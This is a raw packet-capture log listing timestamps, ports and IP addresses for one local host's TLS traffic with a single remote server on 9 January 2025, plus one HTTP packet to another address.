Jan 9, 2025 14:41:08.610447884 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.610466957 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.610677958 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.639086008 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.645349979 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.655069113 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.658605099 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.663566113 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.681936026 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.684779882 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.699373007 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.702112913 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.749986887 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.752512932 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.752620935 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.755245924 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.755914927 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.761538029 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.779355049 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.781770945 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.797146082 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.799876928 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.850693941 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.853490114 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.854064941 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.854077101 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.854135036 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.855894089 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.856034040 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.860738993 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.895364046 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.897674084 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.943629980 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.946361065 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.949287891 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.949687958 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.952445030 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.954843998 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.956345081 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.956362009 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.956388950 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.956418991 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.958676100 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.958967924 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.963635921 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.011452913 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.038320065 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.042165041 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.049415112 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.050579071 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.050595999 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.050683022 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.052970886 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.053069115 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.060705900 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.062366962 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.062383890 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.062459946 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.066272020 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.066898108 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.071702003 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.382430077 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.382450104 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.382519960 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.383546114 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.383563042 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.383630991 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.386055946 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.386092901 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.386861086 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.386981964 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.392400026 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.392957926 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.469652891 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.472718954 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.482933998 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.482991934 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.483006001 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.483189106 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.485805035 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.485821962 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.485878944 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.486816883 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.487013102 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.489738941 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.489825964 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.492202044 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.494843006 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.577878952 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.581449986 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.583451033 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.585603952 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.588474035 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.588531017 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.588545084 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.588574886 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.590375900 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.590466022 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.595159054 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.635433912 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.672082901 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.674731970 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.680444956 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.684015036 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.686326981 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.782552958 CET	49677	80	192.168.2.8	192.229.211.108
Jan 9, 2025 14:41:09.890907049 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.890927076 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.891149998 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.891560078 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.891640902 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.891654015 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.891669035 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.891716003 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.895009041 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.895180941 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.895437002 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.895608902 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.899903059 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.900263071 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.950100899 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.982690096 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.986341000 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.991146088 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.997298002 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.997315884 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.997364044 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:09.997714043 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.997729063 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:09.997828007 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.000715017 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.000756025 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.000973940 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.001210928 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.006311893 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.047378063 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.085827112 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.088619947 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.093966961 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.098442078 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.098498106 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.098562956 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.101414919 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.101470947 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.101507902 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.101540089 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.101558924 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.102073908 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.103969097 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.104039907 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.107016087 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.108927965 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.260076046 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.263704062 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.271583080 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.271596909 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.271688938 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.277117014 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.277189016 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.301564932 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.302354097 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.342999935 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.343012094 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.346426964 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.346503973 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.351408005 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.445991039 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.448955059 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.457840919 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.457880020 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.457936049 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.461709976 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.461783886 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.466689110 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.491835117 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.491888046 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.491947889 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.494944096 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.495879889 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.500693083 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.546430111 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.550749063 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.567859888 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.567894936 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.567945004 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.571068048 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.571171045 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.576102972 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.594145060 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.594161987 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.594218016 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.597208977 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.597568035 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.602443933 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.656585932 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.659826994 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.671426058 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.671442986 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.671492100 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.674561024 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.674638987 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.680471897 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.696281910 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.696304083 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.696389914 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.699505091 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.700340033 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.705126047 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.760162115 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.763946056 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.774328947 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.774358034 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.774399996 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.777396917 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.777565956 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.786653996 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.799397945 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.799431086 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.799478054 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.802473068 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.802742004 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.813688993 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.875438929 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.878319025 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.881086111 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.881117105 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.881139994 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.881170034 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.883511066 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.884138107 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.888330936 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.931380033 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.947594881 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.947611094 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.947683096 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.950607061 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.950773954 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.956408024 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.956420898 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.977145910 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.979834080 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.982726097 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.982760906 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:10.982801914 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.982845068 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.985301971 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.985495090 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:10.990369081 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.035480022 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.051064968 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.051090956 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.051203012 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.054208040 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.054599047 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.058990955 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.059640884 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.079361916 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.082587957 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.084903955 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.084950924 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.084988117 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.085026979 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.087929010 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.088726997 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.092920065 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.139755964 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.153279066 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.153295994 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.153444052 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.156739950 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.158130884 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.162487030 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.163053989 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.181679010 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.184304953 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.187218904 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.187275887 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.187304020 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.187352896 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.190392017 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.192322969 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.195563078 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.240063906 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.259057045 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.259077072 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.259146929 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.262356997 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.262540102 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.268028021 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.268042088 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.284682035 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.287317038 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.291469097 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.291553974 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.291555882 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.291604042 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.294498920 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.295253038 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.300550938 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.343396902 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.362850904 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.362867117 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.362940073 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.366552114 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.366585970 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.371726036 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.388508081 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.391693115 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.410495043 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.410514116 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.410573006 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.414397955 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.414719105 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.419696093 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.465759993 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.465780973 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.465835094 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.468630075 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.468911886 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.473774910 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.499165058 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.502398014 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.513139009 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.513159037 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.513283968 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.516330957 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.516495943 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.521694899 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.571116924 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.571171045 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.571228027 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.574795008 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.574974060 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.579845905 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.601764917 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.605076075 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.624991894 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.625030994 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.625108957 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.628554106 CET	49705	443	192.168.2.8	13.107.246.45
